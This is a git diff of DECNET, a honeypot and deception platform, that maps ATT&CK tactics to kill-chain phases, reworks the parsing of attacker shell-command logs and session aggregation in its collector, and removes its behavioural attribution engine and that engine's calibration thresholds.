# enterprise-bundle validation in :func:`validate_against_attack_bundle`
|
||||
# so a startup check doesn't false-fail the moment ICS rules are wired.
|
||||
_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
|
||||
{"TA0100", "TA0102", "TA0105", "TA0106"}
|
||||
)
|
||||
|
||||
|
||||
def validate_against_attack_bundle() -> None:
|
||||
"""Assert every enterprise tactic ID in :data:`ATTACK_TACTIC_TO_UKC` resolves in the loaded STIX bundle.
|
||||
|
||||
Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
|
||||
typoed tactic ID surfaces as a fail-closed boot, not a silent
|
||||
miss in campaign rollups.
|
||||
"""
|
||||
from decnet.ttp.attack_stix import assert_known_tactic_ids
|
||||
|
||||
assert_known_tactic_ids(
|
||||
list(ATTACK_TACTIC_TO_UKC.keys()),
|
||||
source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
|
||||
exempt=set(_NON_ENTERPRISE_TACTICS),
|
||||
)
|
||||
|
||||
|
||||
def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
|
||||
"""Map an ATT&CK tactic ID (e.g. ``"TA0001"``) to a :class:`UKCPhase`.
|
||||
|
||||
Returns ``None`` for unknown tactics. The map is closed-over the
|
||||
enterprise + ICS tactics referenced by the rule pack; a tactic
|
||||
outside that set is a contributor bug, not a runtime miss.
|
||||
"""
|
||||
return ATTACK_TACTIC_TO_UKC.get(tactic)
|
||||
|
||||
|
||||
# Inverse map, built once at import time. Several enterprise tactics
|
||||
# would collide (e.g. both TA0009 and TA0100 map to COLLECTION); the
|
||||
# enterprise tactic wins because it's listed first in
|
||||
# ATTACK_TACTIC_TO_UKC, which dict comprehension preserves via
|
||||
# last-write semantics — so we iterate in reverse to keep the FIRST
|
||||
# occurrence per phase. Pre-target phases (RECONNAISSANCE,
|
||||
# RESOURCE_DEVELOPMENT, WEAPONIZATION, SOCIAL_ENGINEERING) that are
|
||||
# not in OBSERVABLE_PHASES are deliberately lossy on the inverse —
|
||||
# TTP tags must never assign them, so projecting back to a tactic
|
||||
# is undefined. See TTP_TAGGING.md §UKC bridge.
|
||||
_UKC_TO_TACTIC: dict[UKCPhase, str] = {
|
||||
phase: tactic
|
||||
for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
|
||||
}
|
||||
|
||||
|
||||
def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
|
||||
"""Map a :class:`UKCPhase` back to an ATT&CK tactic ID.
|
||||
|
||||
Lossy on phases outside :data:`OBSERVABLE_PHASES` — pre-target
|
||||
phases (e.g. ``RECONNAISSANCE``, ``WEAPONIZATION``) return
|
||||
``None`` because no rule emits them, so the inverse is
|
||||
undefined by design. The CDD test in E.2.9 pins which phases
|
||||
are lossy.
|
||||
"""
|
||||
return _UKC_TO_TACTIC.get(phase)
|
||||
|
||||
@@ -115,11 +115,11 @@ async def run_clusterer_loop(
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
@@ -18,7 +18,6 @@ from datetime import datetime
|
||||
from pathlib import Path
|
||||
from typing import Any, Callable, Optional
|
||||
|
||||
from decnet.artifacts.shards import find_shard_with_sid
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.bus.publish import (
|
||||
@@ -76,21 +75,6 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
|
||||
)
|
||||
_RL_MAX_ENTRIES: int = 10_000
|
||||
|
||||
# APP-NAMEs we never want to see in the ingestion stream — native unix
|
||||
# daemons that share a container with a DECNET service. Their logs are
|
||||
# noise: sshd's "Failed password for root from X" duplicates the
|
||||
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
|
||||
# again, and CRON/systemd/etc. say nothing about attacker behavior.
|
||||
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
|
||||
_DROP_APPS: frozenset[str] = frozenset(
|
||||
a.strip()
|
||||
for a in os.environ.get(
|
||||
"DECNET_COLLECTOR_DROP_APPS",
|
||||
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
|
||||
).split(",")
|
||||
if a.strip()
|
||||
)
|
||||
|
||||
_rl_lock: threading.Lock = threading.Lock()
|
||||
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
||||
|
||||
@@ -98,11 +82,10 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
|
||||
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
||||
"""
|
||||
Return True if this parsed event should be written to the JSON ingestion
|
||||
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
|
||||
rate-limits connection-lifecycle events within a dedup window.
|
||||
stream. Rate-limited connection-lifecycle events return False when another
|
||||
event with the same (attacker_ip, decky, service, event_type) was emitted
|
||||
inside the dedup window.
|
||||
"""
|
||||
if parsed.get("service", "") in _DROP_APPS:
|
||||
return False
|
||||
event_type = parsed.get("event_type", "")
|
||||
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
||||
return True
|
||||
@@ -133,234 +116,6 @@ def _reset_rate_limiter() -> None:
|
||||
with _rl_lock:
|
||||
_rl_last.clear()
|
||||
|
||||
|
||||
# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
|
||||
#
|
||||
# The TTP worker subscribes to ``attacker.session.ended`` and turns each
|
||||
# emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
|
||||
# (see ``decnet/ttp/worker._build_events``). No upstream worker was
|
||||
# producing that topic — the rule pack therefore never fired on live
|
||||
# traffic. The aggregator below indexes shell-command events
|
||||
# per-attacker_ip and emits one ``attacker.session.ended`` envelope
|
||||
# whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
|
||||
#
|
||||
# Memory bound: each attacker_ip's deque is capped by a TTL eviction
|
||||
# (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
|
||||
|
||||
_SESSION_AGG_TTL_SEC: float = _parse_float_env(
|
||||
"DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
|
||||
)
|
||||
|
||||
|
||||
# Body of a bash PROMPT_COMMAND CMD line:
|
||||
# ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
|
||||
# Splits into the structured fields the inspector renders + the
|
||||
# residual ``cmd=`` value (which may itself contain spaces — preserve
|
||||
# everything after ``cmd=`` as one token, do NOT word-split).
|
||||
_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
|
||||
|
||||
|
||||
def _parse_cmd_msg(msg: str) -> dict[str, str]:
|
||||
"""Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.
|
||||
|
||||
Returns the empty dict on a non-CMD msg. ``command`` carries the
|
||||
full post-``cmd=`` rest, including any embedded whitespace —
|
||||
tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
|
||||
everything after the first space.
|
||||
"""
|
||||
if not msg.startswith("CMD "):
|
||||
return {}
|
||||
head, sep, cmd_rest = msg[4:].partition("cmd=")
|
||||
out: dict[str, str] = {}
|
||||
for k, v in _CMD_BODY_HEAD_KV_RE.findall(head):
|
||||
out[k] = v
|
||||
if sep:
|
||||
out["command"] = cmd_rest
|
||||
return out
|
||||
|
||||
|
||||
def _parse_iso_ts(value: str) -> Optional[datetime]:
|
||||
"""Best-effort ISO-8601 parse for parsed event timestamps.
|
||||
|
||||
The collector's parser stamps ``timestamp`` either as the original
|
||||
ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
|
||||
reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
|
||||
``fromisoformat`` after a space→T swap. Returns None if neither
|
||||
shape parses — the aggregator skips events it can't time-stamp.
|
||||
"""
|
||||
if not value:
|
||||
return None
|
||||
candidates = (value, value.replace(" ", "T"))
|
||||
for cand in candidates:
|
||||
try:
|
||||
return datetime.fromisoformat(cand)
|
||||
except ValueError:
|
||||
continue
|
||||
return None
|
||||
|
||||
|
||||
class _SessionAggregator:
|
||||
"""Per-attacker_ip command index that emits ``attacker.session.ended``.
|
||||
|
||||
Thread-safe — :meth:`add_event` is called from the per-container
|
||||
stream threads. Internal state is protected by a single lock; the
|
||||
publish fan-out happens inside the lock for simplicity (the
|
||||
downstream publish_fn is the thread-safe marshaller from
|
||||
:mod:`decnet.bus.publish`, which is non-blocking).
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
publish_fn: Callable[[str, dict[str, Any], str], None],
|
||||
*,
|
||||
ttl_sec: float = _SESSION_AGG_TTL_SEC,
|
||||
) -> None:
|
||||
self._publish = publish_fn
|
||||
self._ttl = ttl_sec
|
||||
self._lock = threading.Lock()
|
||||
# attacker_ip → list of (timestamp, parsed_event) tuples.
|
||||
# Stored as a list rather than a deque so the ``in_window``
|
||||
# filter can index linearly; the per-attacker volume is
|
||||
# bounded by the TTL and by typical session size (≤ a few
|
||||
# hundred commands) so this stays cheap.
|
||||
self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}
|
||||
|
||||
def add_event(self, parsed: dict[str, Any]) -> None:
|
||||
"""Index a parsed event. Emits on ``session_recorded``."""
|
||||
event_type = parsed.get("event_type", "")
|
||||
attacker_ip = parsed.get("attacker_ip") or ""
|
||||
if not attacker_ip or attacker_ip == "Unknown":
|
||||
return
|
||||
ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
|
||||
if ts is None:
|
||||
return
|
||||
with self._lock:
|
||||
self._evict_expired(ts)
|
||||
if event_type == "command":
|
||||
self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
|
||||
return
|
||||
if event_type == "session_recorded":
|
||||
self._emit_session(parsed, attacker_ip, ts)
|
||||
|
||||
def _evict_expired(self, now: datetime) -> None:
|
||||
"""Drop commands older than ``self._ttl`` seconds."""
|
||||
cutoff = now.timestamp() - self._ttl
|
||||
for ip, entries in list(self._cmds.items()):
|
||||
kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
|
||||
if kept:
|
||||
self._cmds[ip] = kept
|
||||
else:
|
||||
del self._cmds[ip]
|
||||
|
||||
def _emit_session(
|
||||
self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
|
||||
) -> None:
|
||||
"""Build an ``attacker.session.ended`` envelope and publish it.
|
||||
|
||||
Slices the per-IP deque to commands whose timestamp falls
|
||||
inside ``[ended_at - duration_s, ended_at]``. Commands stay in
|
||||
the deque after the slice — the TTL eviction is the only path
|
||||
that drops them, so two back-to-back sessions for the same IP
|
||||
share the visible window without losing rows.
|
||||
"""
|
||||
fields = parsed.get("fields", {}) or {}
|
||||
duration_raw = fields.get("duration_s") or "0"
|
||||
try:
|
||||
duration_s = float(duration_raw)
|
||||
except (TypeError, ValueError):
|
||||
duration_s = 0.0
|
||||
sid = str(fields.get("sid") or "")
|
||||
service = str(fields.get("service") or parsed.get("service") or "")
|
||||
decky = parsed.get("decky") or ""
|
||||
|
||||
commands_window = self._cmds.get(attacker_ip, [])
|
||||
cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
|
||||
commands: list[dict[str, Any]] = []
|
||||
for idx, (cmd_ts, cmd_parsed) in enumerate(commands_window):
|
||||
if cmd_ts.timestamp() < cutoff_lo:
|
||||
continue
|
||||
cmd_fields = cmd_parsed.get("fields", {}) or {}
|
||||
# Pull structured uid/user/src/pwd/command from the bash
|
||||
# msg body. The inspector renders these as separate
|
||||
# key/value rows, which is much friendlier than dumping
|
||||
# the raw ``CMD uid=0 user=... cmd=...`` string into a
|
||||
# single ``command_text`` blob.
|
||||
parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
|
||||
cmd_text = (
|
||||
cmd_fields.get("command")
|
||||
or cmd_fields.get("cmd")
|
||||
or parsed_kv.get("command")
|
||||
or cmd_parsed.get("msg", "")
|
||||
)
|
||||
entry: dict[str, Any] = {
|
||||
"id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
|
||||
"command_text": str(cmd_text),
|
||||
"ts": cmd_ts.isoformat(),
|
||||
"decky": cmd_parsed.get("decky", ""),
|
||||
"service": cmd_parsed.get("service", ""),
|
||||
}
|
||||
for key in ("uid", "user", "src", "pwd"):
|
||||
value = parsed_kv.get(key) or cmd_fields.get(key)
|
||||
if value is not None:
|
||||
entry[key] = value
|
||||
commands.append(entry)
|
||||
|
||||
# Resolve the asciinema shard so consumers (notably the BEHAVE-SHELL
|
||||
# session-ended handler in the profiler worker) don't each have to
|
||||
# disk-reach independently. Shard fields can be malformed or the
|
||||
# transcripts dir may not exist yet — find_shard_with_sid returns
|
||||
# None in those cases and we publish ``shard_path: None`` so the
|
||||
# consumer skips honestly. Additive field; existing TTP consumers
|
||||
# ignore it.
|
||||
shard_path: str | None = None
|
||||
resolve_error: str | None = None
|
||||
if sid and decky and service:
|
||||
try:
|
||||
resolved = find_shard_with_sid(decky, service, sid)
|
||||
except (ValueError, OSError, PermissionError) as exc:
|
||||
resolve_error = f"{type(exc).__name__}: {exc}"
|
||||
resolved = None
|
||||
if resolved is not None:
|
||||
shard_path = str(resolved)
|
||||
if shard_path is None and sid:
|
||||
# Loud-by-default — the BEHAVE-SHELL handler will skip
|
||||
# session.ended events with shard_path=None, so a silent
|
||||
# miss here means the profiler panel never hydrates. Surface
|
||||
# the most common failure modes inline so the operator can
|
||||
# diagnose without grepping decnet/artifacts/shards.py.
|
||||
#
|
||||
# 1. ARTIFACTS_ROOT not readable by the collector's user
|
||||
# (perm 0750 decnet:decnet vs. User=anti without
|
||||
# SupplementaryGroups=decnet).
|
||||
# 2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
|
||||
# 3. sessrec hasn't flushed the shard for this sid yet
|
||||
# (collector tick won the race; next tick recovers).
|
||||
logger.warning(
|
||||
"collector: shard_path=None decky=%s service=%s sid=%s "
|
||||
"(error=%s) — profiler will skip this session.ended; "
|
||||
"check ARTIFACTS_ROOT perms / service whitelist",
|
||||
decky, service, sid, resolve_error or "shard not found",
|
||||
)
|
||||
|
||||
payload: dict[str, Any] = {
|
||||
"session_id": sid or None,
|
||||
"attacker_uuid": None, # consumer resolves via repo
|
||||
"attacker_ip": attacker_ip,
|
||||
"decky_id": decky,
|
||||
"service": service,
|
||||
"ended_at": ended_at.isoformat(),
|
||||
"duration_s": duration_s,
|
||||
"commands": commands,
|
||||
"shard_path": shard_path,
|
||||
}
|
||||
topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
|
||||
try:
|
||||
self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
logger.debug(
|
||||
"collector: session.ended publish failed: %s", exc,
|
||||
)
|
||||
|
||||
# ─── RFC 5424 parser ──────────────────────────────────────────────────────────
|
||||
|
||||
_RFC5424_RE = re.compile(
|
||||
@@ -374,27 +129,6 @@ _RFC5424_RE = re.compile(
|
||||
r"(\S+) " # 4: MSGID (event_type)
|
||||
r"(.+)$", # 5: SD element + optional MSG
|
||||
)
|
||||
|
||||
# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
|
||||
# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
|
||||
# That inner RFC 5424 line lands on the container's stdout, where the
|
||||
# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
|
||||
# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
|
||||
# sees ``event_type == "-"`` while the real MSGID (``command``) is
|
||||
# inside the body. We detect that case and re-extract the inner
|
||||
# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
|
||||
# ``event_type == "command"`` plus the real source hostname.
|
||||
#
|
||||
# Anchored on an ISO-8601 timestamp at the head of the body so we
|
||||
# don't false-match free-form prose like "Connection from 1.2.3.4".
|
||||
_INNER_RFC5424_RE = re.compile(
|
||||
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
|
||||
r"(\S+)\s+" # 2: inner HOSTNAME
|
||||
r"(\S+)\s+" # 3: inner APP-NAME
|
||||
r"\S+\s+" # PROCID (NIL or PID)
|
||||
r"(\S+)\s+" # 4: inner MSGID
|
||||
r"(.+)$", # 5: inner SD/MSG remainder
|
||||
)
|
||||
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
||||
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
|
||||
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
|
||||
@@ -434,23 +168,8 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
||||
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
||||
|
||||
fields: dict[str, str] = {}
|
||||
|
||||
# Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
|
||||
# stdout envelope around the inner ``logger --msgid command`` line).
|
||||
# Outer MSGID is NIL; the real MSGID is inside the body. Detect
|
||||
# the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
|
||||
# remainder so downstream extraction sees the real header.
|
||||
if event_type == "-" and sd_rest.startswith("-"):
|
||||
body = sd_rest[1:].lstrip()
|
||||
inner = _INNER_RFC5424_RE.match(body)
|
||||
if inner is not None:
|
||||
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
|
||||
decky = i_host
|
||||
service = i_app
|
||||
event_type = i_msgid
|
||||
sd_rest = i_rest
|
||||
|
||||
msg: str = ""
|
||||
|
||||
if sd_rest.startswith("-"):
|
||||
msg = sd_rest[1:].lstrip()
|
||||
elif sd_rest.startswith("["):
|
||||
@@ -458,28 +177,16 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
||||
if block:
|
||||
for k, v in _PARAM_RE.findall(block.group(1)):
|
||||
fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
|
||||
# Always recover the post-SD message tail, even when the SD
|
||||
# block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
|
||||
# syslog auto-emits on bash CMD lines). Without this the body
|
||||
# of unwrapped PROMPT_COMMAND lines stays empty and the
|
||||
# attacker_ip kv-fallback below has nothing to scan.
|
||||
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
|
||||
if msg_match:
|
||||
msg = msg_match.group(1).strip()
|
||||
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
|
||||
if msg_match:
|
||||
msg = msg_match.group(1).strip()
|
||||
else:
|
||||
msg = sd_rest
|
||||
|
||||
attacker_ip = "Unknown"
|
||||
for fname in _IP_FIELDS:
|
||||
if fname in fields:
|
||||
raw = fields[fname]
|
||||
# remote_addr may be "host:port" — split so identity keys on IP only.
|
||||
host, _, port = raw.rpartition(":")
|
||||
if host and port.isdigit():
|
||||
attacker_ip = host.strip("[]") # handle [::1]:port IPv6 form
|
||||
fields.setdefault("remote_port", port)
|
||||
else:
|
||||
attacker_ip = raw
|
||||
attacker_ip = fields[fname]
|
||||
break
|
||||
|
||||
# Fallback for plain `logger` callers that don't use SD params (notably
|
||||
@@ -513,12 +220,6 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
||||
except ValueError:
|
||||
ts_formatted = ts_raw
|
||||
|
||||
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
|
||||
# "CMD ") get event_type rewritten to "command". `fields` stays empty
|
||||
# so the frontend's msg-based pill rendering doesn't double up.
|
||||
if event_type == "-" and msg.startswith("CMD "):
|
||||
event_type = "command"
|
||||
|
||||
return {
|
||||
"timestamp": ts_formatted,
|
||||
"decky": decky,
|
||||
@@ -645,7 +346,7 @@ def _stream_container(
|
||||
publish_fn: CollectorPublishFn | None = None,
|
||||
) -> None:
|
||||
"""Stream logs from one container and append to the host log files."""
|
||||
import docker
|
||||
import docker # type: ignore[import]
|
||||
|
||||
lf: Optional[Any] = None
|
||||
jf: Optional[Any] = None
|
||||
@@ -715,17 +416,12 @@ def _make_system_log_publisher(
|
||||
thread can call it unconditionally. Otherwise each call is marshalled
|
||||
onto *loop* (the asyncio event loop that owns the bus socket) via
|
||||
``make_thread_safe_publisher``.
|
||||
|
||||
The same call also feeds a :class:`_SessionAggregator` so shell
|
||||
commands are indexed per-attacker_ip and ``attacker.session.ended``
|
||||
fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
|
||||
"""
|
||||
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
|
||||
if raw_publish is None:
|
||||
return lambda _parsed: None
|
||||
|
||||
topic = _topics.system(_topics.SYSTEM_LOG)
|
||||
aggregator = _SessionAggregator(raw_publish)
|
||||
|
||||
def _publish(parsed: dict[str, Any]) -> None:
|
||||
event_type = parsed.get("event_type", "")
|
||||
@@ -740,7 +436,6 @@ def _make_system_log_publisher(
|
||||
},
|
||||
event_type,
|
||||
)
|
||||
aggregator.add_event(parsed)
|
||||
|
||||
return _publish
|
||||
|
||||
@@ -755,7 +450,7 @@ async def log_collector_worker(log_file: str) -> None:
|
||||
|
||||
Watches Docker events to pick up containers started after initial scan.
|
||||
"""
|
||||
import docker
|
||||
import docker # type: ignore[import]
|
||||
|
||||
log_path = Path(log_file)
|
||||
json_path = log_path.with_suffix(".json")
|
||||
|
||||
@@ -39,7 +39,6 @@ Shape::
|
||||
master-host = 10.0.0.1 # required on agents
|
||||
syslog-port = 6514
|
||||
swarmctl-port = 8770
|
||||
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
|
||||
|
||||
[logging]
|
||||
system-log = /var/log/decnet/decnet.system.log
|
||||
@@ -121,7 +120,6 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
|
||||
"master-host": "DECNET_SWARM_MASTER_HOST",
|
||||
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
||||
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
||||
"swarmctl-host": "DECNET_SWARMCTL_HOST",
|
||||
},
|
||||
"logging": {
|
||||
"system-log": "DECNET_SYSTEM_LOGS",
|
||||
|
||||
@@ -1,21 +0,0 @@
|
||||
"""DECNET attribution engine — v0 aggregation library.
|
||||
|
||||
Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
|
||||
observations. No I/O, no bus, no DB. The bus subscriber and DB writes
|
||||
live in :mod:`decnet.correlation.attribution_worker` so this package
|
||||
stays trivially testable with synthetic observation lists.
|
||||
|
||||
See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
|
||||
explicit bright line: this engine does NOT do persona classification
|
||||
(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
|
||||
named persons. It surfaces *behavioural coherence* and *behavioural
|
||||
drift*, and stops there.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.correlation.attribution.aggregate import (
|
||||
AttributionState,
|
||||
aggregate_observations,
|
||||
)
|
||||
|
||||
__all__ = ["AttributionState", "aggregate_observations"]
|
||||
@@ -1,62 +0,0 @@
|
||||
"""Calibration thresholds for the attribution engine — every magic
|
||||
number lives here, named, with the calibration source cited.
|
||||
|
||||
v0 values are heuristic. Real calibration ships when red-team
|
||||
exercises produce labelled trace data
|
||||
(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
|
||||
are the engine's only knobs; aggregate.py never embeds a literal.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
# ── Categorical merger ────────────────────────────────────────────────
|
||||
# Last-N window size for the categorical state machine. 5 calibrates
|
||||
# against typical session counts (most attackers are observed < 10
|
||||
# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
|
||||
# 2"). Operators with long-running attackers will want a wider window
|
||||
# in v1.
|
||||
CATEGORICAL_WINDOW_N = 5
|
||||
|
||||
# Minimum observations before the merger emits anything other than
|
||||
# ``unknown``. Below this floor the state machine has no signal.
|
||||
MIN_OBSERVATIONS_FOR_STATE = 3
|
||||
|
||||
# Categorical merger is one-outlier-tolerant: in a window of N=5, the
|
||||
# state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
|
||||
CATEGORICAL_MAJORITY_THRESHOLD = 4
|
||||
|
||||
# ── Numeric merger ────────────────────────────────────────────────────
|
||||
# EWMA smoothing factor for numeric primitives. 0.3 weights recent
|
||||
# observations enough to surface drift quickly without flapping on
|
||||
# single outliers.
|
||||
NUMERIC_EWMA_ALPHA = 0.3
|
||||
|
||||
# Coefficient-of-variation thresholds: dispersion / |mean|.
|
||||
NUMERIC_STABLE_DISPERSION_PCT = 0.20 # < 20% of mean → stable
|
||||
NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30 # mean moved > 30% → drifting
|
||||
NUMERIC_CONFLICT_DISPERSION_PCT = 1.0 # > 100% of mean → conflicted
|
||||
|
||||
# ── Hash merger ───────────────────────────────────────────────────────
|
||||
# Rotations within HASH_DRIFT_WINDOW count toward state transitions.
|
||||
# Below DRIFT_MAX → drifting; above → conflicted. The values mirror the
|
||||
# DEBT-032 fingerprint-rotation calibration — bumped by one because
|
||||
# the attribution engine takes one rotation as evidence-of-life, not
|
||||
# yet evidence-of-drift.
|
||||
HASH_DRIFT_MAX = 2
|
||||
HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60 # 24h
|
||||
|
||||
# ── Multi-actor cap ───────────────────────────────────────────────────
|
||||
# multi_actor confidence is capped to keep the dashboard honest about
|
||||
# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
|
||||
# flapping primitives on flaky networks look like two operators.
|
||||
MULTI_ACTOR_MAX_CONFIDENCE = 0.6
|
||||
|
||||
# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
|
||||
# Minimum number of primitives that must independently flag
|
||||
# ``multi_actor`` for the same identity before
|
||||
# ``attribution.profile.multi_actor_suspected`` fires.
|
||||
MULTI_ACTOR_MIN_PRIMITIVES = 2
|
||||
|
||||
# Tick interval for the periodic walk in
|
||||
# :mod:`decnet.correlation.attribution_worker`. Configurable via env
|
||||
# var in v1; hardcoded in v0.
|
||||
MULTI_ACTOR_TICK_SECS = 60.0
|
||||
@@ -1,418 +0,0 @@
|
||||
"""Per-(identity, primitive) state-machine — the attribution engine's
|
||||
core merge logic.
|
||||
|
||||
Pure: given a list of BEHAVE observations for one
|
||||
``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
|
||||
returns the derived state. No DB, no bus, no I/O. The worker
|
||||
(``decnet.correlation.attribution_worker``) is responsible for loading
|
||||
the observations and writing the state row.
|
||||
|
||||
State vocabulary is frozen at five values (see
|
||||
``ATTRIBUTION-ENGINE.md``):
|
||||
|
||||
* ``unknown`` — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
|
||||
* ``stable`` — recent N agree
|
||||
* ``drifting`` — recent N stable but disagree with older N
|
||||
* ``conflicted`` — recent N split
|
||||
* ``multi_actor`` — conflicted + cross-session alternation pattern
|
||||
|
||||
Phase 2 ships :func:`_aggregate_categorical` (the dominant ValueKind
|
||||
for BEHAVE-SHELL primitives). Phase 3 adds numeric + hash mergers and
|
||||
the ValueKind dispatcher in :func:`aggregate_observations`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from collections import Counter
|
||||
from dataclasses import dataclass
|
||||
from typing import Any, Sequence
|
||||
|
||||
from decnet.correlation.attribution import _thresholds as _T
|
||||
|
||||
__all__ = [
|
||||
"AttributionState",
|
||||
"aggregate_observations",
|
||||
"aggregate_categorical",
|
||||
"aggregate_numeric",
|
||||
"aggregate_hash",
|
||||
]
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class AttributionState:
|
||||
"""Output of the merger for one ``(identity, primitive)`` pair.
|
||||
|
||||
The fields map onto :class:`AttributionStateRow` columns; the
|
||||
worker composes the final dict for ``upsert_attribution_state``
|
||||
by adding ``identity_uuid`` + ``primitive`` (the merger does not
|
||||
own the natural key) and a ``last_change_ts`` derived from the
|
||||
prior row.
|
||||
"""
|
||||
|
||||
current_value: Any
|
||||
state: str
|
||||
confidence: float
|
||||
observation_count: int
|
||||
last_observation_ts: float
|
||||
|
||||
|
||||
def aggregate_observations(
|
||||
observations: Sequence[dict[str, Any]],
|
||||
*,
|
||||
value_kind: str | None = None,
|
||||
) -> AttributionState:
|
||||
"""Run the merger over *observations* and return derived state.
|
||||
|
||||
*observations* is a list of dicts with at minimum ``value``,
|
||||
``ts``, ``confidence`` (matching
|
||||
``ObservationRow.observations_time_series`` output). Sessions
|
||||
are derived from the ``ts`` axis — the merger does not need a
|
||||
separate session id; cross-session alternation is detected by
|
||||
the gap distribution. Sessions are NOT collapsed before the
|
||||
merger; ``multi_actor`` reasons over the full per-observation
|
||||
series.
|
||||
|
||||
*value_kind* is a hint from the BEHAVE primitive registry — Phase
|
||||
2 only honours ``"categorical"`` (or ``None``, treated as
|
||||
categorical). Phase 3 will dispatch on ``"numeric"`` /
|
||||
``"hash"`` to the matching merger.
|
||||
"""
|
||||
if not observations:
|
||||
return _unknown(0.0, count=0)
|
||||
if value_kind in (None, "categorical"):
|
||||
return aggregate_categorical(observations)
|
||||
if value_kind == "numeric":
|
||||
return aggregate_numeric(observations)
|
||||
if value_kind == "hash":
|
||||
return aggregate_hash(observations)
|
||||
raise ValueError(
|
||||
f"aggregate_observations: unknown value_kind={value_kind!r}; "
|
||||
"expected 'categorical' | 'numeric' | 'hash' | None",
